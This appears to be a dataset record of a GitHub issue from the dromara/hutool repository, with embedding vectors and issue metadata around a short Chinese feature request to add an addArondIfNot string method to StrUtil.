0.020595215260982513, 0.014313539490103722, 0.004982604179531336, -0.019659070298075676, 0.018519412726163864, -0.0025727059692144394, -0.010650359094142914, -0.008384613320231438, -0.004266927018761635, 0.018858596682548523, -0.010121232829988003, -0.0019927024841308594, -0.006162962410598993, -0.007319577969610691, -0.014788396656513214, 0.012203819118440151, 0.007258524652570486, -0.011735745705664158, -0.01193247176706791, 0.0011913817143067718, -0.01172217819839716, -0.010256906040012836, 0.005243775434792042, -0.007936891168355942, -0.013302773237228394, -0.010419714264571667, -0.0032120668329298496, 0.017596835270524025, -0.0091172493994236, 0.01383189857006073, 0.03123200684785843, 0.01969977095723152, -0.02623922750353813, 0.019157078117132187, 0.0109691908583045, 0.00753665529191494, 0.009938073344528675, 0.00007870114495744929, -0.008052214048802853, -0.02550659142434597, 0.02063591778278351, -0.011206619441509247, -0.013675875030457973, -0.004578975960612297, -0.00005405735282693058, -0.0020045738201588392, 0.010799599811434746, -0.002611712086945772, 0.008506719954311848, 0.011240538209676743, -0.01420500036329031, 0.0021046330220997334, -0.015398926101624966, 0.005131844896823168, 0.014422077685594559, 0.013479148037731647, -0.009415730834007263, 0.005962844006717205, -0.027921577915549278, 0.014259270392358303, -0.005562607664614916, 0.010033044964075089, 0.015507465228438377, -0.0021945165935903788, 0.0054913791827857494, 0.013886168599128723, -0.0155345993116498, 0.0004816404252778739, -0.0019977902993559837, -0.01416429877281189, 0.010256906040012836, -0.010589305311441422, 0.004361898638308048, -0.0173933245241642, -0.004772310610860586, 0.012122415006160736, -0.01929275132715702, 0.009564971551299095, 0.00028088624821975827, -0.012230953201651573, -0.0146934250369668, 0.013058560900390148, 0.023213712498545647, -0.008520286530256271, 0.013886168599128723, -0.01022298727184534, 0.030987795442342758, 0.0010005909716710448, -0.005226816050708294, -0.007014312781393528, 0.0007241565617732704, 0.016837064176797867, 0.002089369809255004, 0.013641956262290478, 0.006742965895682573, -0.023742837831377983, -0.006929516792297363, -0.0010065267561003566, 0.02832859754562378, 0.02112434245646, 0.017094843089580536, -0.006776884198188782, 0.005013130605220795, -0.015141147188842297, -0.024122722446918488, 0.0546492300927639, -0.01018228568136692, 0.023498626425862312, -0.01432710699737072, 0.013017859309911728, -0.024489041417837143, -0.014232135377824306, -0.019849011674523354, -0.024868926033377647, 0.03136768192052841, 0.0091172493994236, 0.015059743076562881, -0.010840301401913166, -0.015466762706637383, -0.01531752198934555, -0.0016526711406186223, 0.0124208964407444, -0.006529280450195074, 0.020405273884534836, 0.015575301833450794, -0.00437207380309701, 0.002130071632564068, 0.03288722410798073, 0.00681419437751174, -0.011450831778347492, -0.0005465092253871262, -0.0030933525413274765, 0.00546763651072979, -0.009707428514957428, 0.002537091728299856, 0.018370172008872032, 0.012020659632980824, 0.023715702816843987, 0.01622653380036354, 0.0065631987527012825, -0.009225788526237011, -0.014232135377824306, 0.004619678016752005, 0.009456433355808258, 0.008818767964839935, 0.010039828717708588, -0.015426061116158962, 0.004263535141944885, -0.02906123362481594, -0.00774016510695219, -0.008778066374361515, -0.003612303175032139, 0.0016721741994842887, 0.000588483177125454, 0.00255744275636971, -0.0008585579926148057, 0.02998381294310093, -0.003965053707361221, -0.029875272884964943, 0.0021945165935903788, -0.0022996633779257536, -0.006305419374257326, 0.0006508081569336355, -0.02461114712059498, 0.001146439928561449, -0.022074054926633835, -0.007360279560089111, 0.019821878522634506 ]
null
null
null
null
null
null
null
null
null
[ "dromara", "hutool" ]
期望:添加 addArondIfNot 用途:将指定字符串添加在文本两端,功能类似addPrefixIfNot和addSuffixIfNot。
[feature] 希望可以在StrUtil中增加 addArondIfNot 方法
https://api.github.com/repos/dromara/hutool/issues/3553/comments
1
2024-04-19T06:14:00
2024-04-19T09:11:02Z
https://github.com/dromara/hutool/issues/3553
2,252,167,116
3,553
false
This is a GitHub Issue repo:hutool owner:dromara Title : [feature] 希望可以在StrUtil中增加 addArondIfNot 方法 Issue date: --- start body --- 期望:添加 addArondIfNot 用途:将指定字符串添加在文本两端,功能类似addPrefixIfNot和addSuffixIfNot。 --- end body ---
224
[ -0.0005799734499305487, 0.009408557787537575, -0.019934965297579765, -0.0032944283448159695, 0.056924283504486084, 0.004589627962559462, -0.02182670868933201, 0.035054583102464676, -0.03625841811299324, -0.030067257583141327, -0.013020068407058716, 0.08008380979299545, -0.012797932140529156, 0.025065602734684944, -0.0053348601795732975, 0.04222027584910393, -0.014689675532281399, 0.01956234872341156, -0.02899240329861641, -0.01921839453279972, -0.03284754604101181, 0.014381550252437592, -0.03086981549859047, 0.014524864964187145, 0.03878074511885643, 0.01926138997077942, 0.00837669800966978, -0.014589356258511543, 0.0015952629037201405, -0.003883806988596916, -0.006191160995513201, -0.005277534481137991, 0.03439533710479736, 0.012511304579675198, 0.018071884289383888, 0.025251910090446472, 0.042564231902360916, 0.049815915524959564, -0.04505789279937744, 0.010110796429216862, -0.014818658120930195, -0.02820417657494545, -0.02890641614794731, 0.02515159174799919, 0.008777976967394352, 0.03442399948835373, -0.0032603912986814976, 0.00025594967883080244, -0.004847593139857054, 0.010168122127652168, 0.014689675532281399, -0.021454092115163803, 0.03101312927901745, -0.030296560376882553, 0.02569618448615074, 0.06036381796002388, 0.018702464178204536, -0.03270423412322998, 0.0029200208373367786, 0.011171319521963596, -0.04568847268819809, -0.014431710354983807, 0.03250359371304512, 0.014453208073973656, -0.0007689686608500779, 0.00837669800966978, -0.03018190898001194, 0.02935068868100643, 0.0073125921189785, 0.05434463545680046, -0.012489806860685349, 0.02568185143172741, 0.020164266228675842, -0.020020952448248863, -0.005607156548649073, -0.0008822762174531817, 0.01630912348628044, -0.0018594979774206877, -0.020880836993455887, -0.007208689581602812, -0.0034305767621845007, -0.013951608911156654, -0.02271525375545025, -0.04500056803226471, -0.01881711557507515, -0.016223134472966194, 0.019533686339855194, -0.058758702129125595, -0.00668201083317399, 0.01580752432346344, -0.005252454895526171, 0.00559282535687089, -0.011551100760698318, -0.0016024286160245538, 0.011959545314311981, 0.056494344025850296, -0.007703122682869434, 0.008082904852926731, -0.06391800194978714, -0.009523209184408188, -0.0107915373519063, 0.027874555438756943, -0.007710288278758526, 0.00859166868031025, 0.03686033561825752, 0.015348919667303562, 0.03668836131691933, -0.02735862508416176, 0.01683938503265381, 0.015377582050859928, 0.007437991909682751, -0.010282772593200207, -0.005273951683193445, 0.03284754604101181, -0.00016559474170207977, 0.0303825493901968, 0.0015845143934711814, -0.039439987391233444, -0.025868160650134087, 0.009516043588519096, -0.007445157505571842, 0.016094151884317398, 0.008104401640594006, -0.02568185143172741, -0.016982698813080788, -0.018000226467847824, -0.022543277591466904, -0.003287262748926878, 0.020923830568790436, 0.0003244716499466449, -0.04267888143658638, -0.004550216719508171, 0.009573369286954403, 0.025466881692409515, 0.04594643786549568, 0.019333045929670334, 0.009372729808092117, 0.04560248553752899, -0.04436998441815376, 0.007255266420543194, -0.03597179055213928, -0.05620771646499634, -0.017856912687420845, 0.013815460726618767, -0.03992725536227226, -0.020909499377012253, -0.023288510739803314, 0.01585051789879799, -0.023288510739803314, 0.012905417010188103, 0.026054468005895615, -0.04485725238919258, 0.0248936265707016, 0.011715912260115147, 0.021511416882276535, -0.0031403659377247095, -0.017555953934788704, -0.006044263951480389, -0.010275606997311115, -0.009193587116897106, 0.012518470175564289, -0.013149050995707512, 0.017756592482328415, 0.017498627305030823, -0.04262155666947365, -0.03769155964255333, -0.014789995737373829, 0.0048010158352553844, -0.008727816864848137, 0.03276155889034271, -0.05789881944656372, 0.014675344340503216, 0.01788557507097721, -0.008168892934918404, -0.060191839933395386, 0.013048731721937656, 0.0036974989343434572, -0.021224789321422577, 0.02237130142748356, -0.012754937633872032, -0.01699703000485897, 0.016710402444005013, 0.020536882802844048, -0.04009922966361046, 0.03803551197052002, -0.030009932816028595, -0.0027157985605299473, -0.00916492473334074, 0.04491457715630531, -0.047350917011499405, -0.024478014558553696, -0.005582076497375965, 0.0044749765656888485, -0.030611850321292877, 0.013801129534840584, 0.020121272653341293, -0.02850513719022274, -0.054459284991025925, -0.0065673599019646645, 0.017312319949269295, 0.008190389722585678, -0.012382321991026402, -0.02725830487906933, -0.04070115089416504, -0.03224562853574753, -0.01649543084204197, -0.010641057975590229, 0.019992290064692497, -0.04293684661388397, -0.032388944178819656, -0.003023923374712467, 0.012296332977712154, 0.01693970337510109, 0.00797541905194521, -0.010841697454452515, 0.030296560376882553, 0.04740824177861214, -0.0028250752948224545, 0.0026674300897866488, -0.022199325263500214, 0.024564003571867943, -0.025567201897501945, -0.024836299940943718, -0.010347263887524605, -0.02509426511824131, 0.023947754874825478, 0.005144969094544649, 0.032675571739673615, -0.017211999744176865, -0.027487607672810555, 0.06374602764844894, -0.015635548159480095, -0.015119616873562336, 0.0057576363906264305, 0.07951055467128754, 0.001030964427627623, -0.006914895959198475, -0.01165858656167984, 0.026842694729566574, 0.019089411944150925, 0.010060636326670647, 0.0341946966946125, 0.004374656826257706, -0.030411211773753166, 0.017570285126566887, 0.017326651141047478, 0.025008276104927063, 0.017713598906993866, -0.007305426523089409, 0.005754053592681885, -0.0010551486629992723, -0.00007126507989596575, 0.0151912746950984, 0.019376039505004883, 0.014818658120930195, -0.014137917198240757, -0.000756428693421185, -0.01663874462246895, -0.006452708505094051, -0.006560194306075573, 0.016423773020505905, 0.005514002405107021, 0.0053850202821195126, 0.015133948996663094, 0.014675344340503216, -0.05265352874994278, -0.014209574088454247, 0.010963513515889645, 0.001708122668787837, 0.015492233447730541, 0.07377800345420837, -0.06351672112941742, 0.006345223169773817, 0.04050051048398018, -0.024363365024328232, 0.009157759137451649, -0.01896042935550213, 0.022242318838834763, 0.030554525554180145, -0.030210571363568306, -0.014761332422494888, 0.03726161643862724, 0.016180140897631645, 0.003647339064627886, -0.016237465664744377, 0.000647151842713356, -0.03794952109456062, 0.054258644580841064, -0.009874328039586544, -0.0010641057742759585, -0.0004962243838235736, -0.012948411516845226, -0.00341982813552022, 0.029723305255174637, 0.021153133362531662, 0.024019410833716393, -0.002721172757446766, 0.024277376011013985, -0.02228531241416931, -0.009258078411221504, 0.018344180658459663, -0.03906737267971039, 0.014976303093135357, -0.010390258394181728, -0.009272409602999687, 0.019691331312060356, 0.021626068279147148, -0.007624299731105566, -0.034366674721241, -0.037662893533706665, 0.031987663358449936, -0.035742487758398056, -0.033363476395606995, 0.011257307603955269, -0.023087870329618454, -0.024478014558553696, 0.036373071372509, -0.02969464100897312, -0.0332774892449379, -0.015234268270432949, -0.02909272350370884, -0.03966929018497467, -0.01996362768113613, -0.037863533943891525, 0.03694632649421692, 0.0010023016948252916, -0.038350801914930344, -0.0028304497245699167, 0.012081362307071686, -0.02834749035537243, -0.012403818778693676, -0.014008934609591961, -0.010017641820013523, -0.0033804168924689293, -0.03634440526366234, -0.05792748183012009, -0.002576067578047514, -0.011780403554439545, 0.005230957642197609, -0.011350461281836033, 0.00281611829996109, -0.02735862508416176, 0.0037369101773947477, -0.0016391528770327568, 0.042506903409957886, -0.029164379462599754, 0.003570307744666934, -0.00906460452824831, 0.003638381836935878, 0.05898800492286682, 0.0007098516798578203, 0.0032729313243180513, -0.002260776935145259, 0.002882400993257761, -0.04273620620369911, -0.035484522581100464, -0.006477788556367159, -0.004019955173134804, -0.012303498573601246, 0.019777318462729454, -0.009881493635475636, -0.035742487758398056, 0.005764801986515522, 0.010203950107097626, 0.022686591371893883, 0.01210285909473896, -0.018559150397777557, -0.0049479128792881966, -0.04113109037280083, -0.03803551197052002, -0.00891412515193224, 0.040729813277721405, 0.00253665610216558, -0.0044427309185266495, -0.023947754874825478, 0.006853987462818623, 0.00539576867595315, 0.008749313652515411, 0.03955463692545891, 0.005481756757944822, 0.0018917436245828867, 0.031930338591337204, 0.03215964138507843, -0.024836299940943718, -0.021167464554309845, 0.006467040162533522, -0.033420804888010025, 0.006689176429063082, 0.013987437821924686, -0.022313974797725677, -0.02791754901409149, 0.04391138255596161, -0.0374622568488121, -0.0062269894406199455, -0.026699380949139595, 0.02923603728413582, -0.05331277474761009, -0.011680083349347115, 0.004156103357672691, -0.011386290192604065, 0.03688900172710419, -0.03471062704920769, 0.03462463989853859, -0.003880223957821727, 0.01447470486164093, 0.008577337488532066, 0.0010139459045603871, -0.016667407006025314, 0.011594095267355442, 0.016180140897631645, 0.0022643597330898046, 0.024879293516278267, -0.022485952824354172, 0.008949953131377697, 0.04677765816450119, 0.023302841931581497, -0.006090841256082058, -0.0008428649161942303, 0.009910156950354576, 0.01980598270893097, -0.014632349833846092, -0.025008276104927063, 0.004181183408945799, 0.04686364904046059, 0.016524093225598335, -0.023675458505749702, -0.013163382187485695, 0.014345722272992134, 0.017412640154361725, -0.02618345059454441, -0.03482528030872345, -0.013485838659107685, 0.042564231902360916, 0.003693915903568268, -0.02559586428105831, -0.04247824102640152, 0.004532302264124155, -0.02672804333269596, 0.016724733635783195, 0.014890315011143684, -0.012883920222520828, 0.012704777531325817, -0.01802888885140419, -0.016065489500761032, 0.01049774419516325, -0.013844123110175133, -0.031156443059444427, 0.011887888424098492, -0.009293907321989536, 0.02247162163257599, 0.011744574643671513, 0.03152906149625778, -0.02410539984703064, 0.013306695967912674, -0.008455520495772362, -0.010934851132333279, 0.027057666331529617, 0.022614935413002968, 0.03107045590877533, -0.010798702947795391, 0.014503367245197296, -0.01143645029515028, -0.00023848330602049828, -0.0076028029434382915, 0.04491457715630531, -0.02089516818523407, 0.035541847348213196, -0.022056009620428085, 0.00916492473334074, -0.016122814267873764, -0.010354429483413696, -0.01817220263183117, 0.049328647553920746, 0.0006762624834664166, -0.009000113233923912, 0.013944443315267563, -0.0071656955406069756, -0.03577115014195442, -0.026255108416080475, 0.018157871440052986, -0.022514615207910538, -0.06265684217214584, -0.004750856198370457, 0.022056009620428085, -0.008727816864848137, -0.0019401119789108634, 0.011135490611195564, -0.030296560376882553, -0.0030310892034322023, 0.06156765669584274, 0.015477902255952358, -0.014367219060659409, 0.005030318163335323, -0.007248100824654102, -0.02396208606660366, 0.012697611935436726, -0.03135708346962929, 0.011386290192604065, 0.0129699083045125, -0.0020458060316741467, 0.016538424417376518, 0.012676115147769451, 0.0067894961684942245, -0.014818658120930195, 0.0574115514755249, -0.03230295330286026, -0.044283997267484665, -0.00978117436170578, -0.045172542333602905, 0.015004966408014297, -0.03740492835640907, -0.03883806988596916, -0.0012360824039205909, -0.019304383546113968, 0.02237130142748356, -0.03101312927901745, -0.04560248553752899, 0.03471062704920769, -0.0021120887249708176, 0.007280346471816301, -0.010132293216884136, 0.048726730048656464, -0.04391138255596161, 0.006617519538849592, 0.04213428869843483, -0.011228644289076328, 0.01126447319984436, -0.009745345450937748, 0.008168892934918404, -0.02198435366153717, -0.007660128176212311, 0.006284314673393965, 0.009186421521008015, 0.013636318035423756, -0.009114764630794525, 0.004360325634479523, -0.004113109316676855, -0.017469964921474457, -0.021970022469758987, 0.016810720786452293, -0.027645252645015717, 0.054258644580841064, -0.0165957510471344, 0.01336402166634798, 0.011594095267355442, 0.020121272653341293, -0.014904646202921867, 0.0007089559803716838, -0.009401392191648483, 0.05781283229589462, -0.026140457019209862, -0.0036867503076791763, 0.006982970051467419, -0.003443116554990411, 0.022930225357413292, -0.014467539265751839, -0.01259729266166687, 0.02000662125647068, -0.004199097398668528, 0.011350461281836033, -0.005696727894246578, -0.006785913370549679, 0.027874555438756943, -0.001468071830458939, 0.03886673226952553, 0.002217782661318779, 0.010440418496727943, -0.02602580562233925, -0.024721648544073105, 0.00539576867595315, 0.033220164477825165, 0.0018541236640885472, 0.011214313097298145, -0.01887444220483303, 0.0006099798483774066, 0.006033515557646751, -0.007846436463296413, 0.011988208629190922, -0.02182670868933201, -0.01242531556636095, 0.008706320077180862, -0.011615592055022717, -0.021654730662703514, 0.005646567791700363, 0.02247162163257599, -0.007000884506851435, -0.014718337915837765, -0.02978063002228737, -0.02075185440480709, -0.006237737834453583, 0.016925372183322906, -0.005639402195811272, -0.00092795753153041, 0.029207374900579453, -0.01461801864206791, 0.03660237044095993, 0.009716683067381382, 0.020966824144124985, 0.00970951747149229, -0.0030848318710923195, -0.00393754942342639, 0.012582961469888687, 0.024392027407884598, 0.010877525433897972, -0.03674568608403206, -0.008032744750380516, -0.002522324677556753, -0.009329735301434994, 0.014789995737373829, 0.004600376356393099, -0.01891743578016758, 0.020192930474877357, 0.035484522581100464, 0.01744130253791809, 0.00222853128798306, -0.004406902473419905, 0.02168339490890503, 0.006158915348351002, 0.015793193131685257, -0.011371959000825882, 0.02667071856558323, -0.04706428572535515, 0.028232838958501816, -0.004424816928803921, -0.01867380179464817, 0.021210458129644394, -0.02884908951818943, -0.01669606938958168, -0.015879180282354355, -0.00869198888540268, -0.010461915284395218, 0.001245039631612599, -0.02281557396054268, -0.028691444545984268, -0.008949953131377697, -0.0028465725481510162, 0.004994489718228579, 0.0005710163386538625, 0.007111952640116215, -0.005481756757944822, -0.018014557659626007, 0.03941132500767708, 0.0074881515465676785, 0.00783210527151823, 0.010848863050341606, -0.0005450407043099403, -0.004679199308156967, 0.043940044939517975, -0.012926914729177952, 0.010827365331351757, 0.0015030045760795474, 0.02380443923175335, -0.03803551197052002, 0.0010014058789238334, 0.009243747219443321, -0.017856912687420845, 0.001135762664489448, 0.03385074436664581, -0.019490690901875496, 0.004657702054828405, -0.031041791662573814, -0.0248506311327219, -0.0040557836182415485, -0.022013016045093536, -0.005456677172333002, 0.014216739684343338, -0.024220051243901253, -0.002731921384111047, 0.019576679915189743, 0.011823397129774094, 0.05024585500359535, -0.05443062260746956, -0.017555953934788704, 0.0009503503679297864, -0.012762103229761124, -0.002314519602805376, 0.021798046305775642, 0.0009736388456076384, -0.012059865519404411, -0.02519458532333374, 0.034309349954128265, -0.000887202681042254, -0.00874214805662632, -0.03966929018497467, -0.02745894528925419, 0.015979500487446785, 0.011472278274595737, 0.012955577112734318, 0.009859996847808361, 0.002052971627563238, 0.01336402166634798, -0.01109249610453844, -0.009602031670510769, 0.03585714101791382, 0.035943128168582916, 0.012604458257555962, 0.0074881515465676785, -0.006818159017711878, -0.005818544887006283, 0.012432481162250042, -0.020465226843953133, 0.00418834900483489, -0.02029324881732464, -0.055204518139362335, -0.006810993421822786, 0.014431710354983807, 0.006287897936999798, 0.005775550380349159, -0.04411201924085617, 0.030841153115034103, 0.005273951683193445, 0.025266241282224655, -0.013514501973986626, -0.009580534882843494, -0.006821741815656424, 0.010483412072062492, -0.01299140602350235, 0.007710288278758526, -0.04451330006122589, 0.003758407197892666, -0.029264699667692184, -0.034653302282094955, -0.014517698436975479, -0.021525748074054718, 0.021669063717126846, -0.0016579627990722656, 0.000026465488190297037, 0.012167350389063358, -0.03932533785700798, 0.005101975053548813, -0.05285416916012764, 0.02178371325135231, 0.001161738415248692, 0.00968085415661335, -0.041962310671806335, -0.01708301715552807, -0.0036419646348804235, -0.0010461915517225862, -0.034108709543943405, -0.0071477810852229595, -0.00048189301742240787, 0.018258191645145416, -0.017756592482328415, -0.000035184682928957045, 0.012812263332307339, -0.0027659584302455187, -0.04136039316654205, 0.013765300624072552, -0.0002785664109978825, -0.006671262439340353, -0.008383863605558872, -0.03433801233768463, 0.0018057551933452487, -0.008605999872088432, -0.015936506912112236, 0.03439533710479736, 0.05142103135585785, 0.01600816287100315, -0.008039910346269608, -0.013091725297272205, -0.005349191837012768, 0.005979772657155991, 0.0102254468947649, 0.031443070620298386, 0.040529172867536545, 0.010734211653470993, 0.017842581495642662, -0.0021712055895477533, 0.004969409666955471, 0.005854373332113028, -0.010275606997311115, 0.00007607953011756763, -0.05792748183012009, -0.015391914173960686, -0.031729698181152344, 0.014589356258511543, 0.017813919112086296, -0.0073125921189785, 0.005818544887006283, 0.023933421820402145, 0.00985283125191927, -0.03101312927901745, -0.010626725852489471, 0.021597405895590782, 0.012690446339547634, 0.021712057292461395, -0.008326537907123566, -0.004790267441421747, 0.02612612582743168, -0.05265352874994278, -0.004288668744266033, -0.01046908088028431, 0.011400621384382248, -0.005700310692191124, 0.03674568608403206, -0.022543277591466904, 0.013851289637386799, -0.03680301085114479, -0.008133064024150372, -0.0014223905745893717, 0.012998571619391441, 0.02327417954802513, -0.003701081732288003, -0.004288668744266033, 0.004621873609721661, 0.05030318349599838, 0.020278917625546455, -0.008885461837053299, -0.019146738573908806, 0.010132293216884136, -0.018559150397777557, 0.013528833165764809, -0.026054468005895615, 0.0026280188467353582, 0.014109253883361816, 0.028619786724448204, 0.007344837766140699, 0.017025692388415337, -0.01901775598526001, 0.023030545562505722, -0.009867162443697453, 0.008190389722585678, 0.01861647702753544, -0.009229416027665138, 0.021654730662703514, 0.0058507900685071945, 0.0443413220345974, 0.006861153524369001, 0.007803442422300577, -0.027086328715085983, 0.005474591162055731, 0.011966710910201073, -0.00874214805662632, -0.008047075942158699, -0.02870577573776245, 0.016810720786452293, -0.035943128168582916, 0.013450010679662228, -0.004958661273121834, 0.04491457715630531, -0.009365564212203026, -0.0030292978044599295, -0.05506120249629021, -0.040729813277721405, 0.011149821802973747, -0.018444500863552094, -0.031156443059444427, 0.003344588214531541, 0.007283929269760847, 0.016438106074929237, 0.021052813157439232, -0.01119281630963087, 0.010741377249360085, 0.04654835909605026, 0.03660237044095993, -0.010963513515889645, 0.008734982460737228, -0.03749091923236847, -0.01575019769370556, -0.015133948996663094, 0.025767840445041656, -0.02059420943260193, -0.041417717933654785, -0.021411098539829254, 0.00326576572842896, -0.008075738325715065, 0.004697113297879696, -0.04061516001820564, 0.009293907321989536, -0.024363365024328232, -0.03823615238070488, -0.021898364648222923, -0.006395383272320032, -0.03230295330286026, -0.0023861764930188656, 0.020880836993455887, -0.002187328413128853, 0.01772793009877205, 0.005101975053548813, -0.01015379000455141, -0.0165957510471344, 0.030640512704849243, -0.013664981350302696, -0.022356970235705376, 0.010992176830768585, -0.03284754604101181, 0.017856912687420845, 0.0007998707587830722, -0.025767840445041656, -0.02717231772840023, 0.022156329825520515, 0.037519581615924835, 0.01227483619004488, -0.01976298727095127, 0.04405469447374344, 0.009981813840568066, -0.026584729552268982, -0.0009825959568843246, -0.030067257583141327, -0.004159686155617237, -0.013012902811169624, -0.015305925160646439, -0.005926030222326517, -0.002977346535772085, 0.02692868374288082, 0.017770923674106598, 0.008749313652515411, 0.014288396574556828, -0.003919635433703661, 0.004306582733988762, -0.0070367129519581795, -0.009895825758576393, -0.014875983819365501, -0.04328079894185066, -0.012231841683387756, 0.015606884844601154, -0.017211999744176865, 0.017469964921474457, 0.020622871816158295, 0.013005737215280533, -0.023474818095564842, -0.0033875824883580208, -0.025567201897501945, 0.01014662440866232, -0.02164039947092533, -0.012439646758139133, -0.019533686339855194, 0.013414181768894196, -0.00923658162355423, -0.015477902255952358, 0.004879838787019253, 0.0025205332785844803, -0.0015110659878700972, 0.006667679641395807, -0.009759677574038506, -0.008104401640594006, -0.02075185440480709, 0.005886618979275227, 0.0057898820377886295, -0.016165809705853462, 0.01891743578016758, 0.03161504864692688, -0.015205605886876583, -0.005363523028790951, 0.010354429483413696, 0.010203950107097626, -0.032818883657455444, 0.008090070448815823, -0.008555840700864792, 0.01693970337510109, -0.028877751901745796, -0.011020839214324951, -0.039841268211603165, -0.032675571739673615, 0.004603959154337645, 0.025825167074799538, -0.016409441828727722, 0.0008719755569472909, 0.007946755737066269, -0.021654730662703514, -0.018501825630664825, 0.015119616873562336, -0.012876754626631737, -0.022099005058407784, 0.00341982813552022, 0.01926138997077942, 0.019189732149243355, 0.011622757650911808, -0.001974149141460657, 0.017312319949269295, 0.006793079432100058, -0.012260504998266697, -0.032876212149858475, 0.006291480734944344, -0.00837669800966978, 0.0398126021027565, -0.009544705972075462, 0.002187328413128853, -0.030611850321292877, -0.011250142008066177, 0.01931871473789215, 0.01620880328118801, 0.021511416882276535, 0.003255017101764679, 0.030640512704849243, -0.014775663614273071, 0.023990748450160027, 0.04204830154776573, -0.034309349954128265, 0.01669606938958168, 0.008426858112215996, 0.0014600104186683893, -0.0275735966861248, -0.028619786724448204, 0.00445706257596612, 0.01832984946668148, 0.0031475317664444447, -0.04001324251294136, -0.024807637557387352, -0.024420689791440964, -0.0397266149520874, 0.02469298616051674, 0.014639515429735184, -0.026412753388285637, 0.009086101315915585, 0.016767727211117744, 0.0043495772406458855, 0.04465661197900772, -0.02119612693786621, 0.04247824102640152, -0.002215991262346506, -0.016380779445171356, 0.01415224839001894, -0.008548674173653126, -0.034853942692279816, 0.009673688560724258, -0.006671262439340353, -0.025251910090446472, 0.03330615162849426, 0.031041791662573814, -0.008176058530807495, 0.012231841683387756, -0.0052703688852488995, 0.020178597420454025, -0.001080228597857058, -0.0029218122363090515, -0.024864962324500084, 0.011751740239560604, 0.007774779573082924, -0.01708301715552807, 0.0019634005147963762, 0.0006328204763121903, 0.011744574643671513, 0.0018648721743375063, -0.011708746664226055, -0.013801129534840584, 0.0014304519863799214, -0.03986993059515953, -0.019046418368816376, 0.03425202518701553, 0.018358511850237846, 0.009723848663270473, -0.015520895831286907, -0.0013570035807788372, 0.0003936653956770897, 0.00862033199518919, 0.012260504998266697, 0.004808181431144476, 0.010440418496727943, -0.014689675532281399, -0.0074738203547894955, 0.0209954883903265, 0.03365010395646095, -0.01590784452855587, -0.013872786425054073, -0.03367877006530762, 0.010483412072062492, -0.0048977527767419815, 0.019920634105801582, -0.0023736367002129555, -0.009258078411221504, -0.0058507900685071945, -0.04362475499510765, -0.015477902255952358, -0.006452708505094051, 0.00613741809502244, -0.015105285681784153, 0.020020952448248863, -0.0003392508951947093, 0.006255652289837599, 0.01837284304201603, 0.0002548300544731319, -0.02469298616051674, -0.011536769568920135, 0.0007394101703539491, -0.01744130253791809, -0.006076509598642588, -0.009774008765816689, -0.010813034139573574, -0.006416880059987307, -0.013450010679662228, -0.0063523887656629086, 0.004123857710510492, 0.0034592393785715103, 0.0022070342674851418, -0.01847316324710846, -0.009501712396740913, -0.011278804391622543, -0.024721648544073105, -0.009107599034905434, -0.017713598906993866, -0.011450781486928463, -0.04563114792108536, 0.016882378607988358, -0.019290052354335785, 0.009716683067381382, 0.009050273336470127, 0.006499285809695721, -0.012002539820969105, -0.0014044763520359993, 0.006312977522611618, 0.02291589416563511, -0.00869198888540268, 0.022514615207910538, -0.0016346742631867528, -0.003091997466981411, 0.023474818095564842, -0.014582189731299877, 0.017871243879199028, 0.01237515639513731, 0.030697839334607124, 0.008656159974634647, 0.03476795554161072, -0.0075383116491138935, -0.005453094374388456, 0.021611737087368965, -0.003984126728028059, -0.009250912815332413, 0.01368647813796997, -0.01408059149980545, -0.007796276360750198, 0.017111681401729584, -0.012511304579675198, -0.039697952568531036, 0.008555840700864792, -0.005345608573406935, -0.0017896323697641492, -0.016911040991544724, -0.001452844706363976, -0.01714034378528595, 0.010297104716300964, -0.0076028029434382915, 0.0018541236640885472, 0.010856028646230698, 0.000707164581399411, -0.005811378825455904, 0.016925372183322906, 0.01738397777080536, -0.011056668125092983, 0.007040295749902725, 0.0045394678600132465, -0.017512960359454155, -0.022586271166801453, 0.01853048801422119, 0.007015215698629618, -0.026943014934659004, -0.023532142862677574, -0.004091612063348293, -0.006843239068984985, 0.013944443315267563, -0.013571826741099358, 0.013722307048738003, -0.0055211684666574, -0.03121376968920231, 0.012690446339547634, -0.015979500487446785, -0.006062178406864405, -0.008039910346269608, -0.01683938503265381, 0.013664981350302696, 0.01590784452855587, 0.007645796984434128, -0.018946098163723946, -0.04391138255596161, 0.00891412515193224, -0.02065153419971466, 0.025868160650134087, -0.01970566250383854, 0.020923830568790436, 0.008011247031390667, 0.00867049116641283, 0.013822626322507858, 0.0011644255137071013, -0.004138188902288675, 0.019548017531633377, -0.008039910346269608, 0.005449511576443911, 0.008570171892642975, 0.023976417258381844, -0.013600490055978298, -0.0020923831034451723, 0.0073125921189785, 0.017756592482328415, -0.00161138572730124, -0.011859226040542126, -0.008004081435501575, -0.03018190898001194, -0.0029325608629733324, -0.008340869098901749, 0.025366561487317085, -0.01675339601933956, 0.00203147460706532, -0.007054626941680908, -0.013700809329748154, 0.021955691277980804, -0.007240935228765011, -0.004105943255126476, -0.004388988483697176, -0.015033628791570663, 0.0065351142548024654, -0.018688132986426353, 0.015320256352424622, 0.004560965113341808, 0.031041791662573814, -0.01491897739470005, 0.004811764229089022, 0.010863194242119789, -0.03058318793773651, -0.007466654758900404, 0.008699154481291771, -0.03155772387981415, -0.024492347612977028, 0.009645026177167892, -0.005471008364111185, 0.01907508075237274, 0.003471779404208064, -0.018501825630664825, -0.009594866074621677, -0.006871901918202639, 0.014818658120930195, -0.030439874157309532, 0.0031403659377247095, 0.021224789321422577, 0.003100954694673419, -0.005066146608442068, 0.04015655815601349, -0.003930383827537298, 0.017914239317178726, 0.02089516818523407, 0.006312977522611618, -0.01109249610453844, 0.013801129534840584, 0.010755708441138268, 0.041073765605688095, -0.019032087177038193, -0.006922061555087566, -0.011321798898279667, -0.028978072106838226, -0.001538833137601614, 0.008419692516326904, -0.04164702072739601, 0.007846436463296413, -0.03582847863435745, -0.0012862422736361623, -0.0017367854015901685, 0.011665752157568932, 0.03688900172710419, -0.0018111295066773891, -0.03714696317911148, 0.006284314673393965, -0.003876641159877181, 0.0039769611321389675, 0.039497312158346176, 0.002447084989398718, -0.00605142954736948, -0.018286854028701782, 0.01580752432346344, 0.011214313097298145, -0.009050273336470127, 0.005653733853250742, -0.03723295405507088, 0.006420462857931852, 0.014345722272992134, 0.016868047416210175, -0.02424871362745762, -0.022013016045093536, -0.031185105443000793, 0.009895825758576393, -0.007710288278758526, -0.0048834215849637985, 0.02509426511824131, -0.0028214924968779087, 0.036373071372509, 0.013493004254996777, 0.015778861939907074, -0.005840041674673557, -0.014087757095694542, 0.005402934271842241, -0.015893511474132538, -0.01772793009877205, -0.020680196583271027, 